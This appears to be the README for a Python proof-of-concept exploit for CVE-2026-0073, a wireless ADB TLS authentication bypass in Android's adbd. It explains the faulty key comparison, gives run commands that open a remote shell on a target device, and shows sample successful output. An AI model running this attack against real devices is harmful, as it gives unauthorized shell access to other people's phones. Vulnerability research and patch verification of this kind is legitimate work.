## https://sploitus.com/exploit?id=67E75AD1-695D-5225-B6EE-0A4C16799E65
# CVE-2026-0073 PoC (Wireless ADB TLS Auth Bypass)
This directory contains a Python proof of concept for CVE-2026-0073.
> The script is generated using AI-assisted code generation techniques.
## Summary
CVE-2026-0073 is a logic issue in ADB daemon certificate verification (`adbd_tls_verify_cert` in `auth.cpp`).
The vulnerable check treats any non-zero return from `EVP_PKEY_cmp(...)` as a successful match.
Expected comparison result handling should be:
- `1` = keys match
- `0` = keys do not match
- negative values = error / unsupported comparison
In vulnerable builds, negative values are treated as truthy and can incorrectly mark a certificate as authorized.
## What `poc-cve-2026-0073.py` does
The script:
1. Creates a non-RSA client certificate (`ec` or `ed25519`).
2. Connects to the target ADB TCP service.
3. Performs CNXN -> STLS -> TLS handshake flow.
4. Authenticates via the vulnerable certificate comparison path.
5. Opens a command service (`shell:` with `exec:` fallback).
6. Prints command output.
## Requirements
- Python 3.10+ (recommended)
- `cryptography` package
- Wireless ADB enabled on target
- Network reachability to target ADB port
- Testing authorization for the target device
Install dependency:
```bash
pip install cryptography
```
## Usage
Discover target ADB service (if needed):
```bash
adb mdns services
```
Run the PoC:
```bash
python3 poc-cve-2026-0073.py [port] [command] [key_type] [--verbose]
```
Arguments:
- `target_ip`: Target Android device IP address
- `port`: ADB port (default: `5555`)
- `command`: Command to execute (default: `id`)
- `key_type`: `ec` or `ed25519` (default: `ec`)
- `--verbose`: Enable protocol debug logs
Examples:
```bash
python3 poc-cve-2026-0073.py 192.168.1.100 5555 id
python3 poc-cve-2026-0073.py 192.168.1.100 5555 whoami ec --verbose
python3 poc-cve-2026-0073.py 192.168.1.100 5555 getprop ed25519
```
## Typical successful output
```text
[*] Opening service: 'shell:id'
[*] After OPEN, received: OKAY arg0=2 data=b''
[+] Stream open (local_id=1, remote_id=2)
[+] Command output:
----------------------------------------
uid=2000(shell) gid=2000(shell) ...
----------------------------------------
[+] Exploitation successful.
```
## Troubleshooting
- `Connection refused`
- Wireless ADB may be disabled.
- Wrong target IP/port.
- `certificate_unknown`
- Device likely patched for this issue.
- Or target has no eligible trusted key state for this auth path.
- Timeout waiting for responses
- Confirm network path and target ADB socket availability.
- Retry with `--verbose` for packet-level traces.
## Notes on patch level checks
Base OS security patch level and Mainline module patching can differ.
A device can show an older monthly SPL while receiving newer ADB module fixes.
Useful checks:
```bash
adb shell getprop ro.build.version.security_patch
adb shell pm list packages --apex-only | grep adbd
adb shell dumpsys package com.google.android.adbd | grep -E "versionCode|versionName|lastUpdateTime"
```
## Responsible use
Use this PoC only in authorized environments (owned lab devices, explicit permission, or sanctioned testing).
Do not run this against systems you do not own or do not have written authorization to test.
## References
- Android Security Bulletin (May 2026)
- NVD entry for CVE-2026-0073
- AOSP ADB sources (`daemon/auth.cpp`)